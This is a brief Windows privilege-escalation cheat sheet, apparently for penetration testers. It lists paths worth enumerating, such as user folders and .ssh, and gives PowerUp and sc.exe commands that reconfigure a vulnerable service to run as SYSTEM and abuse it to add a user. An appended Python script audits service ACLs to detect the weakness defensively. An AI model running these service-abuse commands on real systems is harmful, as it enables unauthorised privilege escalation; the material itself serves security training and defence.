Local Reconnaissance Windows

Local Enumeration

  • whoami /priv

  • Files and Directories

C:\program files\

C:\program files (x86)\

C:\users\bob\Documents

C:\users\bob\desktop

C:\users\bob\.ssh

C:\program Files\setup\mail.ps1

C:\inetpub\wwwroot\login.aspx (if the web app uses MSSQL)

  • Local Session

Available tokens of other users/services

  • Vulnerable Service

ipmo .\PowerUp.ps1

Invoke-AllChecks

sc.exe qc vuln  # Query the service configuration

sc.exe config vuln start= demand  # Change start type

sc.exe config vuln obj= "NT AUTHORITY\SYSTEM"  # Change the account the service runs as

Invoke-ServiceAbuse -Name 'vuln' -UserName 'red\alice'  # Abuse
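
A defender-side check for the weakness this section relies on, as an added example that is not part of the original page: it parses service security descriptors in the SDDL form printed by `sc.exe sdshow` and flags allow-ACEs that let broad groups reconfigure a service. The function names and the sample descriptors are constructed for illustration, and deny ACEs are ignored as a simplification.

```python
import re

# Rights that let a principal reconfigure a service (SDDL code -> access mask bit).
RISKY = {"DC": 0x0002,       # SERVICE_CHANGE_CONFIG
         "WD": 0x40000,      # WRITE_DAC
         "WO": 0x80000,      # WRITE_OWNER
         "GW": 0x40000000,   # GENERIC_WRITE (includes change-config for services)
         "GA": 0x10000000}   # GENERIC_ALL
# Broad, low-privilege trustees as SDDL SID aliases.
BROAD = {"WD": "Everyone", "AU": "Authenticated Users",
         "BU": "BUILTIN\\Users", "IU": "INTERACTIVE", "AN": "Anonymous"}

def risky_rights(rights):
    """Return the risky right codes present in an ACE rights field."""
    if rights.lower().startswith("0x"):          # numeric access mask
        mask = int(rights, 16)
        return [code for code, bit in RISKY.items() if mask & bit]
    codes = re.findall("..", rights)             # aligned two-letter right codes
    return [code for code in RISKY if code in codes]

def audit_sddl(service, sddl):
    """Flag allow-ACEs in the DACL that give a broad trustee risky rights."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) != 6 or fields[0] != "A":  # only access-allowed ACEs
            continue
        hits = risky_rights(fields[2])
        if fields[5] in BROAD and hits:
            findings.append((service, BROAD[fields[5]], hits))
    return findings

# Constructed sample data, shaped like `sc.exe sdshow <name>` output.
SAMPLES = {
    "vuln": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCDCLCSWRPWPLOCRRC;;;AU)",
    "hardened": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        for finding in audit_sddl(name, sddl):
            print(finding)
```

A flagged ACE is what lets a non-admin user make the `sc.exe config` changes listed above; restricting these rights to SYSTEM and Administrators with `sc.exe sdset` closes it.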
